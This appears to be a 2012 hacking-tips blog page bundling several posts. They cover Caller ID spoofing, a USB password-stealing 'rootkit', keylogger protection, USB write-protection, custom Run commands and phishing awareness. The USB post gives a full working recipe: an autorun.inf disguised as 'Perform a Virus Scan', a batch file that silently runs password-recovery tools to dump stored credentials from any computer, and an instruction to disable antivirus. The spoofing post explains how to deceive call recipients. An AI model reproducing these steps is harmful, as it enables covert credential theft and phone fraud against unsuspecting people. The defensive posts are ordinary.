Tuesday, May 15, 2012


How to Spoof Caller ID – Caller ID Spoofing

Caller ID SpoofingCaller ID spoofing is the act of making the telephone network to display any desired (Fake) number on the recipient’s Caller ID display unit instead of the original number. The Caller ID spoofing can make a call appear to have come from any phone number that the caller wishes.
Have you ever wondered how to perform Caller ID spoofing? Read on to know more information on how to spoof Caller ID.
Unlike what most people think, an incoming call may not be from the number that is displayed on the Caller ID display unit. Because of the high trust that the people have in the Caller ID system, it is possible for the caller to easily fool them and make them believe that the number displayed on the Caller ID display is real. This is all possible through Caller ID spoofing.
 

How to Spoof Caller ID?

 
You can easily spoof any Caller ID using services like SpoofCard. In order to use the spoofcard service, you need to pay in advance and obtain a PIN (Personal Identification Number) which grants access to make a call using the Caller ID spoofing service. Once you have purchased the service, you will be given access to login to your SpoofCard account. To begin with, you need to call the number given by SpoofCard and enter the PIN. Now you will be given access to enter the number you wish to call and the number you wish to appear as the Caller ID.
Once you select the options and initiate the calling process, the call is bridged and the person on the other end receives your call. The receiver would normally assume that the call was coming from a different phone number ie: the spoofed number chosen by you - thus tricking the receiver into thinking that the call was coming from a different individual or organization than the caller’s. In this way, it becomes just a cakewalk to spoof Caller ID and trick the receiver on the other end. Thus, you neither need to be a computer expert nor have any technical knowledge to spoof caller ID. For more information on SpoofCard service visit the following link.
 
SpoofCard - Caller ID Spoofing Service

How Caller ID Spoofing works?

 
Caller ID spoofing is done through various methods and using different technologies. The most commonly used technologies to spoof Caller ID is VOIP (Voice Over IP) andPRI (Primary Rate Interface) lines.
Today most VOIP systems provide an option for it’s users to enter whatever number they want in the calling party field and this number is sent out when they make a call. Hence it is easily possible for any user to spoof Caller ID provided they have a VOIP system and know how to properly configure it to spoof the Caller ID. However sites like SpoofCard provide an easy and cheap spoofing services for those who aren’t using VOIP systems that they can configure themselves.
Caller ID spoofing is possible and being performed right from the days Called ID system was introduced. However most people are unaware of the fact that it is possible to spoof  Caller ID and make any number to be displayed on the receiver’s end. In the past, Caller ID spoofing service was mostly used by telemarketers, collection agencies, law-enforcement officials, and private investigators. But today, it is available to any Internet user who wish to spoof caller ID.

Thankyou@dattu.

How to Sniff Passwords Using USB Drive

Hack Password using USB Drive
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.
 
MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
 
Mail PassViewRecovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
 
IE PassviewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
 
Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
 
PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. 
 
Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe andpasswordfox.exe into your USB Drive.
 
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
 
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
 
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
 
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
 
2. In the pop-up window, select the first option (Perform a Virus Scan).
 
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
 
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
 
This hack works on Windows 2000, XP and Vista
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

How to Protect Your Computer from Keyloggers

Protect from Keyloggers
Keyloggers have been a major problem today as it does not require any prior knowledge of computers to use it. So hackers mainly use keyloggers to steal your passwords, credit card numbers and other confidential data. Below are some methods through which you can protect your computer from keyloggers:
 

Use a Good Antivirus

This is the first and basic step that you need to take in order to protect your computer from keyloggers. Use a Good antivirus such as Kaspersky, Norton or Mcafee and update it regularly.
 

Use a Good Antispyware

Since keyloggers are basically spywares, if you are a frequent user of Internet then you could be exposed to thousands of keyloggers and spywares. So you should use a good antispyware such as NoAdware.
 

Antilogger can be Handy

Antiloggers are programs that detect the presence of keyloggers on a given computer. Over past few years, I have tested a lot of anti-logging programs and have found Zemana Antilogger as the best antilogger.
Zemana
Normally a keylogger can be easily detected by a Good Antivirus program, but hackers use some methods such as hexing, binding, crypting and similar techniques to make it harder to be detected by antivirus programs. In this case Zemana Antilogger comes handy as the program is specially developed to protect your system against harmful keyloggers.
Zemana Antilogger
 

Online Scanning

When ever you receive a suspicious file, you scan it with online scanners such as Multi engine antivirus scanner which scans your file with 24 antivirus engines and reports it back to you if the file is recognized as a virus or spyware. This ensures that none of the malicious programs can escape from being detected as there are 24 different antivirus engines are involved in the scanning process.
 

Sandboxie

Sandboxie is another great program to help you protect your computer against harmful keyloggers and spywares. Sandboxie runs your computer in an isolated space which prevents your program from making permanent changes to other programs in your computer.
When ever you receive a file that looks suspicious, just run the program with Sandboxie so even if it is a keylogger or any other virus it will not make permanent changes to your computer system.
Sandboxie
To run a program in Sandboxie follow the steps as mentioned below:
1. Open sandboxie and click on sandbox menu on the top
2. Now goto Default sandbox
3. Then click on run any program
4. Now select the file you wish to run in sandboxie and click open
 

Keyscrambler

Keyscrambler is one of the best protection against keyloggers that you can have, Keyscrambler is a small program which encrypts your typed keystrokes so even if the victim has installed a keylogger on your system, he or she will get encrypted keys. Keyscrambler currently supports Firefox, Internet explorer and other applications, however its premium version supports more than 160 applications.
Thankyou@dattu.

How to Write-Protect Your USB Flash Drive

How to Write-Protect USB Flash Drive

 
USB Write ProtectMany a time, it becomes necessary for us to write protect our USB flash drive so as to protect it from viruses and other malware programs. Because flash drives are so popular and most widely used to move data between computers, they are the prime target for attackers as a means to get infections spread around the computer world. Also, since USB drive is not a Read-Only Memory (ROM), the data inside it can easily be modified or deleted by malware programs.
But unfortunately, most of the new flash drives do not come with a write-protect feature as the manufacturers wish to cut down the cost of production. Hence, the only way to write-protect your USB flash drives is to enable this feature on your own computer.
This can be done by adding a small entry to the Windows registry which acts as a switch that can be enabled to make use of the write protection or disabled to allow write access. Just follow these steps:
1. Open the Registry Editor (Open the “Run” dialog box, type regedit and hit “Enter”).
2. Navigate to the following Registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
 3. Create a New Key named as StorageDevicePolicies. To do this right-click onControl, and click on New->Key and name it as StorageDevicePolicies.
4. Now right-click on  StorageDevicePolicies and create a New->DWORD (32-bit) Valueand name it as WriteProtect.
Write-Protect USB Drive





5. Double-click on WriteProtect and set the Value data to 1.
Now the right-protection for USB drives is enabled on your computer (no restart required) and thus it would not be possible for anyone or any program to add/delete the contents from your USB flash drive. Any attempt to copy or download the files onto the USB drive will result in the following error message being displayed.
USB-Write Protect Error







To revert and remove the write-protection, all you need to do is just change the Value data for WriteProtect (Step-5) from 1 back to 0. Now write access to all the USB devices is re-enabled.
Sometimes it may seem difficult to remember and follow the above mentioned steps each time you want to enable/disable the write protection. Hence as an alternative way, there are many tools available to automatically enable/disable the write-protection feature. One of my favorite tool is USB Write Protect by Naresh Manadhar. Using this tool you can limit write access to your USB drives with just a click of a button. You can download this tool from the following link:
Thankyou@dattu.


How to Create Your Own Customized Run Commands

Run commandThe Run command on Microsoft Windows operating system allows you to directly open an application or document with just a single command instead of navigating to it’s location and double-clicking the executable icon. However, it only works for some of the inbuilt Windows programs such as Command prompt (cmd), Calculator (calc) etc. So, have you ever wondered how to create your own customized Run commands for accessing your favorite programs, files and folders? Well, read on to find out the answer.

Creating the Customized Run Command

 
Let me take up an example of how to create a customized run command for opening the Internet explorer. Once you create this command, you should be able to open the Internet explorer just by typing “ie” (without quotes) in the Run dialog box. Here is how you can do that.
1. Right click on your Desktop and select New -> Shortcut.
2. You will see a “Create Shortcut” Dialog box as shown below
Create Shortcut
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
3. Click on “Browse”, navigate to: Program Files -> Internet Explorer from your Root drive (usually C:\) and select “iexplore” as shown in the above figure and click on “OK”.
4. Now click on “Next” and type any name for your shortcut. You can choose any name as per your choice; this will be your customized “Run command”. In this case I name my shortcut as “ie”. Click on “Finish”.
5. You will see a shortcut named “ie” on your desktop. All you need to do is just copy this shortcut and paste it in your Windows folder (usually “C:/Windows”). Once you have copied the shortcut onto your Windows folder, you can delete the one on your Desktop.
6. That’s it! From now on, just open the Run dialog box, type ie and hit Enter to open the Internet Explorer.
In this way you can create customized Run commands for any program of your choice. Say “ff” for Firefox, “ym” for Yahoo messenger, “wmp” for Windows media player and so on.
To do this, when you click on “Browse” in the Step-3, just select the target program’s main executable (.exe) file which will usually be located in the C:\Program Files folder. Give a simple and short name for this shortcut as per your choice and copy the shortcut file onto the Windows folder as usual. Now just type this short name in the Run dialog box to open the program.

Thankyou@dattu

How to Identify and Avoid Phishing Scams

Phishing ScamPhishing is a form of social engineering technique used by hackers to gather sensitive information such as usernames, passwords and credit card details by posing as a trustworty person/organization. Since most online users are unaware of the techniques used in carrying out a phishing attack, they often fall victims and hence, phishing can be very effective.
With the dramatic increase in the number of phishing scams in the recent years, there has also been a steady rise in the number of people being victimized. Lack of awareness among the people is the prime reason behind such attacks. This article will try to create awareness and educate the users about such online scams and frauds.
Phishing scams usually sends an email message to users requesting for their personal information, or redirects them to a website where they are required to enter thier personal information. Here are some of the tips that can be used to identify various phishing techniques and stay away from it.
 

Identifying a Phishing Scam

 
1. Beware of emails that demand for an urgent response from your side. Some of the examples are:
  • You may receive an email which appears to have come from your bank or financial organization stating that “your bank account is limited due to an unauthorized activity. Please verify your account asap so as to avoid permanant suspension”. In most cases, you are requested to follow a link (URL) that takes you to spoofed webpage (similar to your bank website) and enter your login details over there.
  • In some cases, phishing emails may ask you to make a phone call. There may be a person or an audio response waiting on the other side of the phone to take away your credit cards details, account number, social security number or other valuable data.
2. Phishing emails are generally not personalized. Since they target a lagre number of online users, they usually use generalized texts like “Dear valued customer”, “Dear Paypal user” etc. to address you. However, some phishing emails can be an exception to this rule.
3. When you click on the links contained in a phishing email, you will most likely be taken to a spoofed webpage with official logos and information that looks exactly same as that of the original webpages of your bank or financial organization. Pay attention to the URL of a website before you enter any of your personal information over there. Even though malicious websites look identical to the legitimate site, it often uses a different domain or variation in the spelling. For example, instead of paypal.com, a phishing website may use different addresses such as:
  • papyal.com
  • paypal.org
  • verify-paypal.com
  • xyz.com/paypal/verify-account/
 

Tips to Avoid Being a Victim of Phishing

 
1. Do not respond to suspicious emails that ask you to give your personal information. If you are unsure whether an email request is legitimate, verify the same by calling the respective bank/company. Always use the telephone numbers printed on your bank records or statements and not those mentioned in the suspicious email.
2. Don’t use the links in an email, instant messenger or chat conversation to enter a website. Instead, always type the URL of the website on your browser’s address bar to get into a website.
3. Legitimate websites always use a secure connection (https://) on those pages which are intended to gather sensitive data such as usernames and passwords, account numbers or credic card details. You will see a lock icon Picture of the Lock icon in your browser’s address bar which indicates a secure connection. On some websites like paypal.com which uses an extended validation certificate, the address bar turns GREEN as shown below.
HTTPS Address Bar


In most cases, unlike a legitimate website, a phishing website or a spoofed webpage will not use a secure connection and does not show up the lock icon. So, absence of such security features can be a clear indication of phishing attack. Always double-check the security features of the webpage before entering any of your personal information.
4. Always use a good antivirus software, firewall and email filters to filter the unwanted traffic. Also ensure that your browser is up-to-date with the necessary patches being applied.
5. Report a “phishing attack” or “spoofed emails” to the following groups so as to stop such attacks from spreading all over the Internet:

Thnakyou@dattu.